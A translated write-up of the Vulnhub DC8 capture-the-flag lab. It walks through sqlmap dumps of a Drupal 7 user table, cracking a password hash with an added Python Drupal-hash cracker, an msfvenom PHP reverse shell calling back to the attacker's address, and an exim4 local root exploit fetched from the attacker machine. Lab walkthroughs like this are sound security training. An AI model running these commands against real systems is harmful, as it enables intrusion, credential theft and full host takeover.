Vulnhub's DC8
2022-06-26 21:54:00 【Tianxia (Tianyan Master)】
Friends, you may as well read the master's write-up directly:
https://blog.csdn.net/weixin_44288604/article/details/122944302
My own write-up is rough.
DC8 itself is low in difficulty, and the target's privileges can be obtained easily. The general approach:
Host discovery and port scanning —— exploit the service vulnerability —— get backend (admin) access —— upload a shell —— escalate privileges
The host found , Port scanning , Service detection
Two ports are open in total, 80 and 22. The service on port 80 is Drupal 7. Open the site and test it; here Burp Suite is used together with xray.
In Burp's User options, set an upstream proxy pointing at xray's listener, then run xray and that is enough. As shown in the figure below, browse the site through Burp with your own browser and click through every function node in the interface.
Clicking through to
http://192.168.43.142/?nid=3
xray reports SQL injection on this page (the nid parameter). Go straight to sqlmap: two databases are found, d7db and information_schema. Choose the first one, d7db, and list its tables:
sqlmap -u "http://192.168.43.142/?nid=3" --batch --level 4 -D d7db --tables
Among the tables, choose users and dump it directly:
sqlmap -u "http://192.168.43.142/?nid=3" --batch --level 4 -D d7db -T users --dump
Two users are found, admin and john, but the passwords are stored as hashes. Try cracking them: put the two hashes into a file and run john against it with a wordlist. john's password cracks as turtle. Log in to the backend and look for a place to plant a shell. Chrome is recommended here; don't ask why, it is so you can right-click and translate the page.

On this page you can define what is shown after the form is submitted. Here msf is used to generate the PHP reverse-shell payload (it had already been generated, so the output is not shown):
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.128 LPORT=8888 -f raw > shell.php
Open the generated file and paste its contents into the location shown above, select PHP code as the text format, and save. Start a matching handler on the attacker side (port 8888, the payload above), then fill in and submit the corresponding form; the session comes back.
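As an added example (not part of the original post, and not Drupal's or john's own code), the following Python port of Drupal 7's $S$ password hashing shows what the cracking step above actually does: john re-hashes each wordlist candidate with the exact parameters carried in the first 12 characters of the dumped hash and compares. The salt/setting and the small wordlist are constructed for the demo; the password turtle is the one the write-up recovered for john, and the real dumped hashes are not reproduced here.

```python
"""Drupal 7 password hashing ($S$...) re-implemented in Python, plus a
minimal dictionary attack of the kind john performs on the dumped hashes.
Added example for this write-up; not part of the original post or of Drupal."""
import hashlib
import hmac

# Drupal's own base64 alphabet (includes/password.inc), not RFC 4648.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
DRUPAL_HASH_LENGTH = 55          # stored hashes are truncated to 55 chars
DRUPAL_MIN_HASH_COUNT = 7
DRUPAL_MAX_HASH_COUNT = 30


def password_base64_encode(data: bytes) -> str:
    """Port of _password_base64_encode(): 3 raw bytes -> 4 ITOA64 chars."""
    count = len(data)
    out = []
    i = 0
    while i < count:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def drupal7_hash(password: str, setting: str) -> str:
    """Port of _password_crypt('sha512', ...).

    `setting` is the first 12 chars of a stored hash: "$S$" + one ITOA64
    char giving log2(iterations) + an 8-char salt. Those same 12 chars
    prefix the output, which is why a cracker can re-hash a candidate
    with exactly the target's parameters and compare.
    """
    setting = setting[:12]
    if setting[0] != "$" or setting[1] != "S" or setting[2] != "$":
        raise ValueError("not a Drupal 7 sha512 setting")
    count_log2 = ITOA64.index(setting[3])
    if not DRUPAL_MIN_HASH_COUNT <= count_log2 <= DRUPAL_MAX_HASH_COUNT:
        raise ValueError("iteration count out of range")
    salt = setting[4:12]
    if len(salt) != 8:
        raise ValueError("salt too short")
    pw = password.encode("utf-8")
    digest = hashlib.sha512(salt.encode("ascii") + pw).digest()
    # PHP: do { $hash = hash($algo, $hash . $password, TRUE); } while (--$count);
    for _ in range(1 << count_log2):
        digest = hashlib.sha512(digest + pw).digest()
    return (setting + password_base64_encode(digest))[:DRUPAL_HASH_LENGTH]


def drupal7_verify(password: str, stored_hash: str) -> bool:
    """Constant-time comparison, as user_check_password() does."""
    try:
        candidate = drupal7_hash(password, stored_hash[:12])
    except ValueError:
        return False
    return hmac.compare_digest(candidate, stored_hash)


def crack(stored_hash: str, wordlist) -> "str | None":
    """Dictionary attack: what `john --wordlist=...` does for a $S$ hash."""
    for word in wordlist:
        word = word.rstrip("\n")
        if drupal7_verify(word, stored_hash):
            return word
    return None


if __name__ == "__main__":
    # Constructed demo: a setting/salt chosen here (the real dumped hashes
    # are not reproduced in this post) with the password the write-up
    # recovered for john. 'D' -> log2 count 15 -> 32768 SHA-512 rounds,
    # Drupal 7's default.
    demo_setting = "$S$Dabcdefgh"
    target = drupal7_hash("turtle", demo_setting)
    print("stored hash:", target, len(target))
    small_wordlist = ["password", "123456", "admin", "turtle", "letmein"]
    print("cracked:", crack(target, small_wordlist))
```

Two details matter for the attacker: the 32768 iterations make each candidate cost 32768 SHA-512 calls, so a weak password like turtle falls quickly while a long random one does not; and because Drupal truncates the stored value to 55 characters, only the first 43 encoded characters of the digest are ever compared, so the cracker compares against that truncated string rather than the full digest.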
Upgrade to an interactive shell with Python, then look for files with the SUID bit set (the command below finds SUID binaries, not sudo rules):
find / -perm -u=s -type f 2>/dev/null
exim4 is found with the SUID bit set. Check its version and search for a matching exploit; the second result is used here. Copy it to the attacker machine, serve it with Python's built-in HTTP server, then download and run it on the target.
Root obtained.